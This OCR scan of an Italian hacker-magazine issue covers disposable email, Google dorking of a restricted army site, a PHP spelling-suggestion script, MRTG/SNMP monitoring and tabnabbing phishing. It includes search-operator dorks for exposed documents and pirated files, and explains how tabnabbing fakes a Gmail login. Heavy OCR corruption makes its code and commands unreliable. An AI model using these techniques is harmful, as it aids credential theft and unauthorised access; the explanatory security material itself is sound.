IN RICEZIONE? 


Negli ultimi tempi si è sviluppato 

un grande interesse attorno ai 

servizi di posta elettronica a 

tempo, in particolare su 10 Minute 
Mail (raggiungibile all'indirizzo 
www.1Ominutemail.com). Si tratta 
però di servizi validi per la ricezione di 
posta, anche se gli indirizzi possono 
essere sfruttati come “maschere”, 

in fase di trasmissione. Il concetto, 
in questo caso, è semplice: un 
servizio che crea indirizzi email 
temporanei, della durata di appena 10 
minuti. Il tempo di mandare qualche 
messaggio utilizzando questo 
indirizzo e zzzot... viene eliminato. 
Risalire al mittente originario diventa 
molto, molto difficile. Ad accalorare il 
senso di riservatezza offerto dal sito, 
ci sono delle condizioni di privacy 
che garantiscono che non è registrato 
alcun log delle attività svolte sulle 
sue pagine. Siamo liberi di crederci 
o meno ma, in caso contrario, basta 
utilizzare un proxy o una VPN mentre 
si visita il sito e il gioco è fatto. 
Insomma, magari per l'anonimato 
assoluto serve qualche sforzo in 

più, ma già con qualche rapido clic 
si ottiene un'invisibilità informatica 
difficile da smascherare. Con tanti 
grazie da parte della nostra privacy. 
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QUANNO. 
A L'HACKER 


ANCHE I SITI 

PIÙ PROTETTI 
POSSONO FARE 
SCIVOLONI 

IN FATTO DI 
SICUREZZA. 
VEDIAMO IL 
CASO DI UN SITO 


STATUNITENSE 
SEGRETISSIMO E 
IMPENETRABILE. 


a notizia è subito 
rimbalzata da Twitter: 
quando si visita il sito 
militare di aepbus 
all'indirizzo https:// 
laepubs.army.mil/ 
compare prima un invito a lasciare 
il sito perché giudicato poco 
sicuro e poi un divieto di accesso. 


arch for 


‘di Mikko. 
redazione@hackerjournal.it 


Per poter accedere è necessaria 
un’autorizzazione che la maggior 
parte dei comuni mortali non ha. 

Ma, sorpresa delle sorprese, basta 
fare una ricerca con Google usando 
come chiave di ricerca site:aepubs. 
army.mil per poter accedere a 
moltissimi documenti, in formato pdf 
nella maggior parte dei casi, e per 
maggiore “sicurezza” di non perderci 
nulla è addirittura disponibile la cache 
consultabile a piacimento. Grazie 
all'elenco dei risultati di Google è 
anche possibile visitare con agio 
diverse aree dell’impenetrabile sito. 
Come mai è potuta succedere una 
cosa simile? Con ottima probabilità il 
sito ha fatto ricorso all’indicizzazione 
di Google e così tantissimi documenti 
delicati finiscono tranquillamente 
nella nutritissima pagina dei risultati 
accessibili da chiunque. In casi come 
questi a volte si parla di attacchi 
basati su Google. Se proviamo a fare 
la ricerca speciale e non vediamo più 


niente, probabilmente i responsabili Isla 
della sicurezza del sito hanno 

(finalmente) posto rimedio alla loro 

piccola falla di sicurezza. La notizia 

è stata data su Twitter da Mikko 

Hyppénen, direttore dei laboratori 

di ricerca di F-Secure il colosso 

finlandese in campo di antivirus, 


GLI ATTACCHI 
GOOGLE BASED 


oe een] 


Il principio è semplice e ne abbiamo 
sotto gli occhi un esempio pratico 
con il sito di aepubs.army.mil che 

è solo l'ultimo esempio illustre: la 
cronaca americana è costellata di 
annunci riguardanti la fuga di notizie 
riservatissime a causa del cattivo uso 
di programmi e strumenti informatici 
fatte da dipendenti distratti o da 
tecnici incompetenti. La tecnica è 
quella di usare il celebre motore 


Ecco che succede usando l'indicizzazione di Google. Malgrado gli 
strumenti messi a punto per rendere inaccessibile il sito ai più, 
molte pagine e documenti sono accessibili a tutti, 


di ricerca per trovare documenti 

{Www altrimenti inaccessibili. | documenti 

possono essere sottoposti a restrizioni 

per diversi motivi: o perché il sito che 

ci interessa richiede di fare un log-in 
1 conun account che non abbiamo, 
oppure limita l’accesso solo a un'area 
geografica e blocca il nostro IP se non 
facciamo parte di.quell’area. Per fare 
queste ricerche particolari dobbiamo 
usare la semplice sintassi richiesta 
dai comandi speciali di Google. Per 
cercare le pagine indicizzate per 
esempio, non dobbiamo fare una 
semplice ricerca che ci restituirebbe 
solo la pagina principale del sito che 
abbiamo inserito e l'elenco di pagine 
che'ne parlano, ma dobblamo usare 
il comando site prima di scrivere 
l’indirizzo del sito. Possiamo fare 
questo esperimento con qualsiasi sito. 
Con un po’ di pazienza potremmo 


avere tante piacevoli sorprese... 


GOOGLE HACKS 


Questo utilissimo strumento ci 
permette di usare dei comandi 
semplici per cercare contenuti 
particolari in Rete. Lo scopo dichiarato 
dello strumento, legale, malgrado 

il nome un po’ curioso, è quello di 
fornire strumenti per usare in modo 
semplice i comandi di Google per 
fare ricerche fruttuose e scovare 
vulnerabilità o usi impropri dei server. 
Per esempio se usiamo le funzioni per 
cercare libri, musica 0 video, invece 
di scrivere un comando dalla sintassi 
complicata come -inurl:(htm|html|php) 
intitle:”index of +"last modified” 
+"parent directory" +description 


Disponibile per tutti i gusti. Google Hacks viene messo a 
disposizione direttamente dalla sezione programmi di Google ed è 
disponibile per Windows, Linux e Mac. 


+size +(.mp3|.wmal.ogg) “titolo della 
canzone o nome del cantante” ci 
basta scrivere il titolo o il nome del 
cantante, fare clic sul tipo di file che 
ci interessa e poi su Search. Grazie ai 
potenti strumenti di indicizzazione di 
Google potremmo trovare una miriade 
di file protetti da copyright e saremo 
in grado di individuare a colpo sicuro i 
server che distribuiscono illegalmente 
file protetti. È possibile scaricare il 
programma nella versione più adatta 
al nostro computer collegandoci 
all'indirizzo http://code.google.com/p/ 
googlehacks/downloads/list. Per 
avere un'idea di come Google possa 
essere uno strumento pericoloso, 
grazie alla sua efficienza, diamo 
un'occhiata anche all’indirizzo www. 
hackersforcharity.org/ghdb. Troviamo 
un esaustivo elenco delle chiavi di 
ricerca utilizzate. Con i relativi risultati. 


de 


ni ido ©amerlingo AK; 


www.guiz.it/ 


| 
Îì 


ISTANZA 
ILEVENSHTEIN > 


implementiamo i forse 


cercavi di Goo 


| “forse cercavi" di Google è una 

funzionalità della ricerca molto 

comoda nel caso di “errori” di 

battitura o semplice dubbio. 

Vediamo come riprodurla per le 
ricerche dei nostri siti. L'algoritmo di 
ricerca della parola ipoteticamente 
corretta si basa sulla distanza di 
Levenshtein anche nota come ‘Edit 
Distance”. 


LA DISTANZA DI 
LEVENSHTEIN 


La distanza di Levenshtein è il nume- 
ro di modifiche elementari necessarie 
per trasformare una stringa A in B. 

Le modifiche sono: 

Sostituzione di un carattere 
Cancellazione di un carattere 
Aggiunta di un carattere 

Mettiamo caso che nella nostra ricer- 
ca scrivessimo erroneamente linxu. 
Per trasformare “linxu” in “linux” 


‘sono necessarie n modifiche. Que- 
sta n è la distanza di Levenshtein. 


La distanza quindi sarà 
Levenshtein(‘linxu',’limux') 

Minore è il numero che esprime que- 
sta distanza maggiore sarà l’attinen- 
za tra le parole. 

Per far funzionare il tutto abbiamo. 
bisogno di un enorme dizionario 
italiano: ne ho estrapolato uno ab- 
bastanza completo eseguendo un 
‘merge’ di diversi dizionari. 

Il problema è che dovremmo esegui- 
re il test per ogni | ‘parola presente nel 
dizionario. Il che diventerebbe molto 
pesante poiché, avendo circa 145000 
parole, ci sarebbero 145000 distanze 
da calcolare, 

La soluzione consiste nell'effettuare 
un primo filtro nella selezione delle 
parole; quindi utilizzare un database 
(nel nostro caso MySQL) per estrarre 
solo le parole che hanno una lun- 
ghezza pari alla parola cercata + un 
valore numerico a nostro piacimento, 


INTERNET. 
L’ALGORITMO 
DI RICERCA 
DELLA PAROLA 
IPOTETICAMENTE 0 
CORRETTA SI 
BASA SULLA 
DISTANZA DI 
LEVENSHTEIN, 
VEDIAMO COME 
FUNZIONA. 


per esempio 1. 

Quindi estrapoleremo dal database 
» nel caso di linxu = 5 char (caratteri) 
- tutte le parole che hanno lunghezz 
di 4,5,6 e le confronteremo con la 
distanza di Levenshtein. 

Per velocizzare ulteriormente l'est 
zione dal dizionario indicizziamo i 
campi “parola” e “lunghezza parola”. 


IL NOSTRO 
DIZIONARIO. 


Il nostro dizionario è composto da Nt 
143770 parole. | campi del database 
sono organizzati così: 

N_REC ID - Progressivo del record 
C_PAROLA - Parola 

N_CHRLEN - Intero che rappresenta 
la lunghezza della parola 

E' disponibile un dump del database 
con le 143770 parole al seguente 
indirizzo ( Oltre al SQL è in CSVITXT 
e XLS): 


http:/www.guido8975.it/index. 
php?ctg=6&id=67 


ATTO PRATICO 
Questo script si basa su 3 file: 
conf.php 
Solito file di configurazione e con- 
11 nessione al database 
ricerca.php 
File della ricerca 
proc.php 
File dell'algoritmo 


FILE GONF.PHP 


"localhost"; 
$user_n="roct"; 
$password="password”; 
Sdb.name="dizionario"; 

|sconnessione = mysql. 

‘connect ($server,|$user n, 

$password) 
or'idie(“Connessione non 

ilnduscita: “ . mysql er. 

Il ror()); 
mysql seleat db($db_ 

[Name Sconnessione) 

lll'or die (“Errore neùla 
selezione del database. ")} 
> 


FILE RICERCA.PHP 
La parola è inserita,in questa pa- 
gina a scopo illustrativo in una 
variabile SrRic a cui possiamo 
‘assegnare invece di ‘linxu’ i dati 
‘provenienti da un POST con $_ 
POST[‘nomecampopost']. 
Saphpi 
i include ‘proc.php’; 
$rRic = trimi/liazu’); 
if(lempey(SrRic)) { 
$rRicRes = 4"; 


$rRicArt'= explode(“ 
", $FRÎc); 
foreach ($rRicArr as 
$i) { 
$rRicRes .= 
LevWord($j)." “; 
} 
$rRicRes = substr_ 
replace($rRicRes.,"",-1); 
} 
if($rRicRes <> $rRic){ 
echo “Forse CErgavi: #.STRi- 
cRes;} ; 
/fRicerca vostro sito 
/f®ui aggiungerete La 
parte di codice ‘per effet- 
tuare la ricerda nel vostro 
sito, 
2> 


FILE PROG.IPHP 
Qui è presente la funzione che calc 
la la distanza di Levenshtein. Modi- 
ficando la variabile SrSrcDis, che di 
default è a 1, possiamo aumentare lo 
spettro di ricerca della parola nel db. 
Maggiore è il numero maggiore sarà 
lo spettro di ricerca. 
<?php FI 
function 
Leviford($SearchPostWord) { 
include. ‘Cont php"; 
Srsrobis' = Vi"; 
$SéarchPostWordLen = 
strlen($SearchPostWord)}; 
$query_rch = \#SELECT + 
FROM italiano WHERE N CHRLEN 
($searchPostWordLen 
1".$SearchPostWor 
".($SearchPoStWotdLen 
+$rsreDis).")%; 
$result_rch = mysql_ 
query(S$query_rch, $connes- 


sione); 
$rWordLevDst = +1; 
while($row.rch'=|mysql_ 
fetch artay($result rch)){ 
$rLevDbst = leve 
néhtein(strtolower($SearchP 


ostWord), strtolower($row. 
rchj'C_PAROLA'])); 
if($rLevDst == 

0) d 

$rWord = 
Srow_tchi 'CLPAROLA']; 

$rWordLevDst 
Lio 

break; 


elseif($rWordLevDst <o JI 

$rlevDst <= $rWordLevDst).{ 
$eWord = 

$row rch[/C ‘PAROLA’ ]}; 
$rWordLevDst, 


{il= SrLevDst; 


} 

} 

àf{lempty($rLevDst)){ 
retuen $rWord;}else{ return 
$SearchPostWord;} 

mysal.iclose(); 
} 
iR> 


CONCLUSIONE 
VISAE ISO TIZIO I 


L'esempio completo è disponibile sul 
sito http:/Amww.guido8975.it/index. 


| php?ctg=6&id=67 .Dove sono dispo- 


nibili sorgenti e dump del database. 
| sorgenti scaricabili sono anche 
commentati. Un esempio del funzio- 
namento è implementato in http:// 
www.geek-blog.it/ nella ricerca. 


ET: 


£ pi e 
COMPUTERANTERMEDIO ———= 


mini httpd + snai ATTP server 


all 


MONITORING 


Per tenere sotto controllo una o più macchine remote, il mondo open- 
source mette a disposizione tantissimo software. Il più semplice da 
usare e da configurare è, senza ombra di dubbio, MRTG (http://oss.0e- 
tiker.ch/mrtg) Iniziamo col dire che sono indispensabili alcune librerie 
ed alcuni programmi: 


Opzionalmente possiamo anche visualizzare remotamente le statisti- 
che avvalendoci di un server web come Mini_httpd 
<http://www.acme.com/software/mini_httpd/> o Apache <http://www. 
apache.org>. Vorrei faceste attenzione durante il copia ed incolla dei 
seguenti comandi. Dato che molti sono sensibili ai cosiddetti “line feed 
error”, specie quelli che cominciano con: 

*Ibin/cat -s > /foo/bar* Ricordo inoltre che ad ogni /bin/cat -s, vanno 
premuti contemporaneamente i tasti: [ctrl] e il tasto [d]. 


ame 


ul 


Cominciamo! 

Con i permessi di amministratore di sistema (o superuten- 
te) creiamo le directory necessarie 

$su - 
Password: 
ministratore 
$mkdir /ete/mretg 

$mkdir /etc/cron.metg 

$mkdir /var/www/localhost/mrtg 


# Digitate la password di am- 


Create le directory possiamo cominciare a configurare il 
nostro file di configurazione snmpd.conf: 


$/bin/cat -s > /etc/snmp/snmpd.conf 
com2sec local 127.0.0.1/32 public 
com2sec local 10.10.10.0/24 public 
group MyROGroup vl local 

group MyROGroup v2c local 

group MyROGroup usm local 

view all included ..1 DI 

ED) 

access MyROGroup "” any noauth > 
exact all none’ none 


syslocation MyLocation 
syscontact Me 


Se avete fatto un copia/incolla, ora dovreste premere con- 
temporaneamente i tasti [ctrl]+[d], così da interrompere 
l'inserimento dei caratteri. Infatti, cat -s, attende un vostro 
“segnale” prima di procedere con la “concatenazione” fi- 
nale dell’informazione. Se preferite incollare solo lo script, 
tralasciatelo :) Questo file consentirà di impostare il servizio 
snmpd secondo le nostre esigenze, ed evitare di permet- 
tere l'accesso in lettura alle persone non addette ai lavori. 
Ricordo inoltre che snmpd è altamente configurabile, e che 
un man snmpd risponderà ad ogni vostra ulteriore doman- 
da. Ora occupiamoci del file /etc/conf.d/snmpd aggiun- 
gendo la riga: 


-c /@etc/snmp/snmpd.conf 


alla variabile: *SNMPD_FLAGS* Dovrebbe quindi risultare 
qualcosa come questo: 


SNMPD_FLAGS="-c. /etc/snmp/snmpd. conf” 


Ora facciamo partire il servizio *snmpd*: 


/etc/init.d/snmpd start 
/sbin/rc-update add snmpd default 


Questa sintassi può variare da distribuzione a di: 
zione. In questo caso ho utilizzato la sintassi di GNU/ 

Linux Gentoo <http://www.gentoo.org/>. Se invece avessi 
utilizzato la sintassi GNU/Linux Slackware <http://www. 
slackware.com/>, avrei dovuto usare */etc/rc.d/rc.snmpd 
start*. Se fossimo in ambiente BSD, avremmo dovuto usare 


At IIIa 


qualcosa come: */usr/local/etc/re.d/snmpd.sh start* Perciò 
accertatevi sul come avviare i servizi del vostro GNU/ 
Linux o BSD (o system V) che sia, e continuate la lettura. 
Accertatevi anche che il path per il file MIB.txt sia corretto. 
Arrivati a questo punto dobbiamocominciare a configurare 
i vari servizi che vorremmo monitorare. 

Primo fra tutti, il traffico generato. Lanciamo quindi il co- 
mando: 


/usr/bin/cfgmaker \ 
--output=/etc/mrtg/traffic.cfg \ 
--ifdesc=ip \ 

--ifref=descr \ 


--global “WorkDir: /var/www/localhost/mrtg” \ 
--global “Options[_]: bits,growright” \ 
public@localhost 


In questo modo il comando cfgmaker creerà un file chia- 
mato */etc/mrtg/traffic.cfg* che conterrà tutte le informa- 
zioni per il polling snmp del traffico di rete. Occupiamoci 
ora della CPU 


/bin/cat -s > /etc/mrtg/cpu.cfg 

WorkDir: /var/www/localhost/mrtg 

LoadMIBs: /usr/share/snmp/mibs/UCD-SNMP-MIB.= 
tat 


Target [localhost .cpu]:SsCpuRawUser. n 
0&essCpuRawUser.0:publie@localhost 

+ ssCpuRawsystem.0&ssCpuRawSystem. 
0:public@localhost+ssCpuRawNice. © 
0&ssCPURAWNIC > e.0:public@localhost 
RouterUptime [localhost.cpu]: public@localhost 
MaxBytes[localhost.cpu]: 100 
Title[localhost.cpu]: CPU Load 
PageTop[localhost.cpu]: <Hl>Active CPU 
Load%</H1> 

Unscaled[localhost.cpu]: ymwd 
ShortLegend[localhost.cpu]: % 
Ylegend[localhost.cpu]: CPU Utilization 
Legendi[localhost.cpu]: Active CPU in % 
Legend2 [localhost .cpu] : 

Legend3 {localhost . cpu]: 

Legendd [localhost . cpu] : 
LegendI[localhost.cpu]: Active 
Legendo[localhost .cpu] : 
Options[localhost.cpu]:growright,nopercent 


pn 


Load) 


Premiamo come poco fa i tasti [ctrl]+[d], e passiamo alla 
memoria: 


/bin/cat -s > /etc/mrtg/mem.cfg 

LoadMIBs: /usr/share/snmp/mibs/HOST-= 
RESOURCES-MIB.txt 

Target [localhost.mem]: .1.3.6.1.4.1.2021.4.13 
.08.1.3.6.1.4.1.2021.4.11.0:public@localhost 
PageTop[localhost.mem]: <Hl>Free Memory </H1> 
WorkDir: /var/ww/localhost/mrtg 
Options[localhost.mem]: nopercent,growright,= 
gauge, noinfo 
Title[localhost .mem] : 


Free Memory 


itsme 


MaxBytes[localhost.mem]: 1000000 
kMG[localhost,mem]: k,M,G,T,P,X 
YLegend[localhost.mem]: bytes 
ShortLegend[localhost.mem]: bytes 

LegendI [localhost .mem]:; Free Memory: 
LegendO[localhost,mem]: 
Legendi[localhost.mem]: Free memory, not = 
including swap, in bytes 


Di nuovo [ctrl]+[d]. La memoria swap: 


/bin/cat -s > /ete/mrtg/swap.cfg 
LoadMIBs: /usr/share/snmp/mibs/UCD-- 
SNMP-MIB. txt 
Target [localhost.swap]: memAvailSwap. = 
O0&memavailswap.0:public@localhost 
; PageTop[localhost.swap]: <H1>Swap Memory</H1> 
sat WorkDir: /var/www/localhost/mrtg 
Options[localhost.swap]: nopercent, + 
growright, gauge, noinfo 
Title[localhost.swap]: Free Memory 
MaxBytes[localhost.swap]: 1000000 
kMG[localhost.swap]: k,M,G,T,P,X 
YLegend[localhost.swap]: bytes 
ShortLegend[localhost.swap]: bytes 
Ù, LegendI [localhost.swap]: Free Memory: 
LegendO[localhost, swap]: 
Legend1[localhost.swap]: Swap memory = 
avail, in bytes 


E il consueto [ctrl]+[d]. Veniamo ora ad un classico del mo- 
nitoraggio: il ping! Questo comodo tool ci permetterà di sa- 
pere i tempi di round trip su siti conosciuti da monitorare. 


/bin/cat -s > /ete/mrtg/ping.cfg 
WorkDir: /var/www/localhost/mrtg 
Titlellocalhost.ping]: Round Trip Time 
PageTop[localhost.ping]: <H1l>Round Trip > 
Time</H1> 

Target [localhost.ping]: ‘/etc/mrtg/ping.sh° 
MaxBytes[localhost.ping]: 2000 
Options[localhost.ping]: growright, + 
unknaszero, nopercent, gauge 

= Legend [localhost.ping]:.Pkt. loss % 

Ma LegendO[localhost.ping]: Ag RTT 
Legendl[localhost.ping]: Maximum Round = 
Trip Time in ms 
Legend2 localhost. ping]: Minimum ‘Round = 
Trip Time in ms 
Legend3[localhost.ping]: Maximal 5 = 
Minute Maximum Round Trip Time în ms 
Legend4 [localhòst.pingl: Maximal Sì 
Minute Minimum Round Trip Time in ms 
YLegend[localhost Ding] :RTT (ms) 


Ancora [ctrl]+[d]. Cominciamo ora a generare gli script che 
andranno a richiamare mrig: 


/bin/cat -s > /etc/cron.mrtg/traffie.sh 


#1/bin/sh 
/usr/bin/mrtg /etc/mrtg/traffic.cfg 
[ctr1]+[d] 


l’bin/cat -s > /etc/cron.mrtg/cpu.sh 
#!/bin/sh 

/usr/bin/mrtg /etc/mrtg/cpu.cfg 
letr1]+[d] 


/bin/cat -s > /eatc/cron.mrtg/mem.sh 
#1/bin/sh 

fusr/bin/mrtg /etc/mrtg/mem.cfg 
[etr1]+[d] 


/bin/cat -s > /etc/cron.mrtg/swap.sh 
#1/bin/sh 

/asr/bin/mrtg /etc/mrtg/swap.cfg 
[ctr1]+[d] 


/bin/cat -s > /etc/cron.mrtg/ping.sh 
#1/bin/sh 

/usr/bin/mrtg /etc/mrtg/ping.cfg 
[etrl]+[d] 


Prepariamo ora lo script che andrà a compiere il comando: 
Ibin/cat -s> 

/etc/mrtg/ping.sh #!/bin/sh PING="/bin/ = 
ping” # Google, for example 
ADDR="google.com” DATA='$PING -c10 -8500 = 


$ADDR -q © Loss='echo $DATA | 
awk ‘(print $18 }' | tr -d %° echo $LOSS.% 
if | $LOsSs = 100 ]; then echo 0 


else echo $DATA | awk -F/ ‘{print $503}° fi. 
Rendiamo quindi eseguibili gli script con: 
/bin/chmod +x /etc/cron.metg/*.sh 


Pbin/chmod +%-/etc/mrtg/ping.sh 


il 


A questo punto avviamo per tre volte ogni script, così da 
poter generare le prime statistiche. Non badate agli errori 
dato che inizialmente non avrà le vecchie (statistiche): 


/bin/sh /etc/cron.mrtg/traffic. sh 
/bin/sh /etc/cron.mrtg/cpu.sh 
/bin/sh /etc/cron.mrtg/mem.sh 
/bin/sh /ete/cron.mrtg/swap.sh 
/bin/sh /etc/cron.mrtg/ping.sh 


ci 


Finalmente abbiamo le nostre statistiche! Non ci resta in- 
fine che generare un index.html che permetta di ordinare 
tutti i nostri grafici: 


/usr/bin/indexmaker --cutput=/var/www/ = 
localhost/mrtg/index.html \ 
--title="Power Under Control :)” \ 
--sort=name \ 

--enumerate \ 

/etc/mrtg/traffic.cfg \ 
/ete/mrtg/cpu.cfg \ 

/etc/mrtg/mem.cfg \ 

/etc/mrtg/swap.cfg \ 

/etc/metg/ping.cfg 


Perfetto! Non ci resta che aggiungere in cron il nostro lavo- 
ro: 


crontabi -e 


/bin/cat 3> /var/spool/cron/crontabs/root 
+/5 % *** /bin/run-parts /etc/cron. = 
mrtg 1> /dev/null 


Bene. Abbiamo concluso!! Puntiamo il nostro browser 
preferito su: /var\www/localhost/www/index.html In caso 
qualcuno di voi volesse usare mini_httpd o apache, sar\t è 
necessario far puntare la DocumentRoot a tale subdirecto- 
ry, avviare il servizio e collegarsi su: http://localhost/mrtg 
Ecco qui le nostre statistiche! Per approfondire meglio lo 
studio dell’snmp, il tool *net-snmp* mette a disposizione 
svariati tool informativi e di diagnosi. Iniziamo con snmp- 
walk: Snmpwalk is an SNMP application that uses SNMP 
GETNEXT requests to query a network entity 

for a tree of information Quindi, snmpwalk, sfrutta la richie- 
sta *GETNEXT* per ottenere informazioni sull'alberatura 
snmp dell’oggetto richiesto. In questo modo possiamo 
utilizzarlo come banale “visualizzatore” di stato. Il risultato 
ottenuto sarà quindi il valore dell’OID (Object Identifier) 
richiesto. Cominciamo quindi con la richiesta dell'oggetto: 
*mgmt.1.2.2.1.10,2* 


$ snmpwalk -v 1 -c public localhost = 
mgmt .1.2.2.1.10.2 
IF-MIB::ifInOctets.2 = Counter32: 


140021440 


Ecco che quindi, snmpwalk, ci ha restituito il valore dell’og- 
getto desiderato. Per conoscere a cosa corrisponde un 
determinato oggetto, possiamo usare un’altra utility messa 


urp 


a disposizione dalla suite net-snmp *snmptranslate*. Come 
è facile intuire, questo programma 

trasforma l'oggetto (OID) in una descrizione sul suo conte- 
nuto, facilitando cosi la lettura e la comprensione. 


$ snmptranslate -IR -TA mgmt.1.2.2.1.10.2 
IF-MIB::ifInOctets.2 
ifInOctets OBJECT-TYPE 


-- FROM IF-MIB, RFC1213-MIB 
SYNTAX Counter32 
MAX-ACCESS read-only 
STATUS current 
DESCRIPTION “The total number of octets received on 


the interface, including framing characters. 

Discontinuities in the value of this counter can occur at re- 
initialization of the management system, 

‘and at other times as indicated by the value of ifCounterDi- 
scontinuityTime.” 


internet (1), 


E) { iso(1) org(3) dod(6) 
momt (2) mib-2(1) 
interfaces(2) ifTable(2) 
ifInoctets(10) 2 } 


ifEntry(1) = 


Ora, per esempio, potreste divertirvi a conoscere gli OID di 
un vostro host, semplicemente con: 


$ snmpwalk -v.1 -c'public localhost 


Quindi, adesso, potrete generare i vostri file di configura- 

zione (oppure come ho fatto io per il ping, con uno script) a 
seconda delle informazioni di cui avete bisogno. Una lettu- 

ra ai manuali di: PA 
mrtg 

snmpd 

snmpwalk 

“snmptranslate 


sarà sicuramente più esplicativa. Beh, non mi resta che au- 
gurarvi un buon *MRTG* a tutti! khazad-dum. 


WEB APPLICATION SECURITY 


di redazione@hackerjournal.it 


MINACCIA WEB 2.0: 
IL TABNABB 


NELL’ERA DEL WEB 2.0, UN AT- 
TACCO INFORMATICO NON RICHIE- 
DE NECESSARIAMENTE DI ESSERE 
TECNICO PER FARE DELLE VITTIME 
O VIOLARE LA PRIVACY ALTRUI. 


PER IL CICLO “LA SICUREZZA WEB 


NON È SOLO SQL INJECTION O 


CROSS SITE SCRIPTING”, QUE- 
STO ARTICOLO MIRA A FARVI APRI- 
RE GLI OCCHI SU ALCUNE REALTÀ 
EMERGENTI, LASCIANDO PER UNA 
VOLTA DA PARTE | SOLITI MEC 


CANISMI DI SPAM E PHISHING 


Una delle prime attività alla quale mi sono dedicato entrando 
in Internet come tanti che hanno avuto l'approccio iniziale 
con la grande rete negli anni 96/97, è stato cominciare a 
smanettare con Netscape Navigator ed Internet Ex- 
plorer 3.0 (i principali browser disponibili in quel partico- 
lare periodo storico) nel tentativo di creare pagine HTML 
interattive, come le chiamavamo a quei tempi. Riuscire a 
posizionare un'immagine al centro della finestra del browser 
o ancorare un collegamento ad una risorsa esterna, appa- 
riva di per sé un miracolo e celava un non so che di mi- 
stico. Eppure le pagine erano esclusivamente statiche e si 
era ben lontani dalla' possibilità di generare contenuti dina- 
mici. No, le CGI in bash o in C non erano certo conside- 
rate sinonimo di flessibilità. Ancora in pochi intravedevano 
nel web un possibile vettore d'attacco e bug come quello 
sul phf [1] non facevano certo presagire una rivoluzione nel 
panorama dell'IT Security governato, almeno fino a quel mo- 
mento, dalla sovversione e dallo sfruttamento di servizi di 
rete vulnerabili e/o mal configurati. Il Web 2.0 cambia però 
radicalmente questo scenario, portando con sé dinamicità, 
flessibilità ma anche una quantità di attacchi completamente 
nuovi, attacchi non necessariamente tecnici, come un buffer 
overflow, ma che fanno comunque leva sull’astuzia e non per 
questo sono da considerarsi meno pericolosi. Oggi parlere- 
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Il vero volto, Y 


del tabnabbing! 
ali 
Ai 


mo proprio di una di queste insidie emergenti. Dopo aver 
letto l'articolo, imparerete probabilmente a vedere la navi- 
gazione in Internet con un occhio completamente diverso! 


Cosa era il phf? 


Il phf era una cgi di esempio che implementava un servizio 
di rubrica telefonica. Lo script veniva incluso di default in 
alcuni web server (principalmente NCSA httpd 1.5 ed 
Apache 1.0.3) durante gli anni 90 e soffriva di una vulne- 
rabilità che consentiva l'esecuzione di codice remoto sul si- 
stema ospite. Quello del phf è stato uno dei bug più semplici 
da sfruttare nella storia delle web application, forse quello 
che più di tutti ha ispirato una nuova generazione di hacker, 
invogliandola a sperimentare e divulgare le tecniche di at- 
tacco web emerse negli anni successivi e che sono state 
le progenitrici della moderna Web Application Security. 


Tabnabbing: il lato pratico 


L'astuzia dicevamo. Uno degli attacchi forse più ingegnosi 
mai partoriti dalla mente umana nell'era del Web 2.0 è il 
tabnabbing. Si tratta di una sorta di phishing avanzato in 
cui sostanzialmente l'utente naviga in un sito che sembra 
solo in apparenza normale. Quando il codice Javascript 
del sito rileva la perdita di focus e quindi che sul tab in 
cui è stato visualizzato non vi è più interazione perché l’u- 
tente ha spostato la sua attenzione verso un'altra tabella 
del browser (o un'altra parte del desktop), il sito modifica 
in tempo reale il suo aspetto. Ad esempio l'icona, il testo 


ed i contenuti ali potrebbero essere sostituiti al volo 
in modo da apparire in tutto e per tutto uguali alla pagina 
di autenticazione di Gmail. L'utente che ritorna sul tab (e 
che magari tiene contemporaneamente aperte altre tabelle 
del browser o sta navigando su finestre multiple) a questo 
punto potrebbe non ricordarsi del sito originale e potrebbe 
essere indotto a pensare che la sua sessione di gmail sia 
scaduta e quindi procedere nuovamente al login. In questo’ 
modo le sue credenziali di autenticazione vengono inter- 
cettate dall'aggressore (di fatto l'interazione sta avvenendo 
su una risorsa web dell'attacker) ed utilizzate per dirottare 
e loggare l'utente verso il vero sito di Gmail, così da non 
destare sospetti. 


Questo trucco sfrutta sostanzialmente la debolezza della 
mente umana nel gestire efficientemente e razionalmen- 
te più tab. Quando si trova a dover lavorare sotto queste 
condizioni, la memoria fa brutti scherzi e l'utente tende a 
confondersi o dimenticare le operazioni compiute appena 
un attimo prima. Vi sembra una stupidaggine? Volete un 
esempio che vi faccia vedere più da vicino cosa accade 
durante una sessione di tabnabbing? 

Benissimo. Prima di capire come tecnicamente questo 
trucco può essere implementato, osserviamo un esempio 
pratico che potrete seguire nei vari step aiutandovi anche 


con le Figura 1,23. 

Aprite diversi tab nel vostro browser e navigate su vari siti 
a vostra scelta. Dopo, da un altro tab, accedete a questo 
URL: http:/www.azarask.in/blog/post/a-new-type-of-phi- 
shing-attack/ (Figura 1). 


Allontanatevi adesso dal browser (ad esempio aprite il 
client di posta elettronica preferito oppure navigate su uno 
dei siti aperti in precedenza) e svolgete questa operazione 
per almeno cinque secondi (Figura 2). Successivamente 
provate ad identificare il tab in cui era stato aperto il sito 
http://www.azarask.in e visualizzatelo (Figura 3). Notate 
nulla di strano? | contenuti del sito originario sono cambiati 
ed ora, al loro posto, trovate la raffigurazione della login di 
Gmail. 


In realtà, essendo questa una dimostrazione delle poten- 
zialità del tabnabbing, ciò che avrete davanti sarà solo 
un'immagine del sito in questione ma, in uno scenario 
reale, potete scommettere che tutto avrà un aspetto più 
veritiero. Provate adesso ad immaginare che la scherma- 
ta di login sia reale. Sapendo di essere utenti Gmail, pro- 
vereste ad autenticarvi? Beh se la risposta è affermativa, 
avreste fornito nelle mani di uno sconosciuto username e 
password del vostro account. 


l'm Aza Raskin iii | mate shy things. | simply. 
To the user, ine inlerface is the product. 


TasnABBING: A NEW TYPE OF PHISHING ATTACK 
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How TÒe ATTACK Works 
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Figura 2: fa vittima sposta la sua attenzione verso un altro tab e comincia ad interagire con quella schermata. Nel mentre, 
in background, il sito aperto precedentemente cambia completamente i suoi connotati 


Figura 3: quando qualche tempo dopo l'utente ritorna nel primo tab aperto in ordine cronologico, si ritrovata pagina di 
autenticazione dî Gmail. Riuscirà ad essere abbastanza sveglio od accorgersi del tentativo dîfuto elle su credenziali? 


Tabnabbing: il lato tecnico 


Non è necessario alcun requisito particolare per mettere 
in atto questo trucco (a parte le ovvie personalizzazioni). 
Tutto ciò che occorre è posizionare un tag <script> nella 
pagina principale di un sito che faccia riferimento a bgat- 
tack.js. Il sorgente Javascript lo trovate qui [2] 


Dando un'occhiata ravvicinata a questo codice (consigliamo 
a tal proposito di stampare il listato che comunque non ha di- 
mensioni eccessive) si comprende benissimo come l’attac- 
co può essere implementato e perfezionato. Anzitutto, nella 
